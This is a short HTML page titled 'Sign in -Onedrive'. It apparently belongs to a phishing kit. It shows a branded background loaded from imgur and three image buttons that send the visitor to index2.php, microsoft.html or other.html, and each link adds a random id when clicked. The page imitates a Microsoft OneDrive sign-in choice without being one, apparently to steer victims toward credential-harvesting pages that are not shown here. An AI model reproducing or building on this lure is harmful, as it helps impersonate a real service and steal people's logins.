<!doctype html>
<html>
<head>
<title>Sign in -Onedrive</title>
</head>
<body>
<style type="text/css">
body{

    background: url('https://i.imgur.com/6V4bWxE.png') no-repeat fixed;
    -webkit-background-size: cover;
    -moz-background-size: cover;
    -o-background-size: cover;
    background-size: cover;
    background-size: 100%;
}
.text{
  font-family: sans-serif;
  font-size: 22px;
  font-weight: bold;
  color:#2E3065;    
  position: relative;
    right: 0;
    top:275px;
}
.buttons {
 position: relative;
    right: 0;
    top:300px;
}
</style>
<center>
  <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>

<a href="index2.php" onClick="this.href=this.href.split('?')[0]+'?id='+new Date().getTime()+Math.random()"><img src="https://i.imgur.com/JzJPr07.png"></a><br><br>
<a href="microsoft.html" onClick="this.href=this.href.split('?')[0]+'?id='+new Date().getTime()+Math.random()"><img src="https://i.imgur.com/QE5eoiD.png"></a><br><br>
<a href="other.html" onClick="this.href=this.href.split('?')[0]+'?id='+new Date().getTime()+Math.random()"><img src="https://i.imgur.com/3N3Mxc3.png"></a><br><br><center>
</center>
</body>
</html>
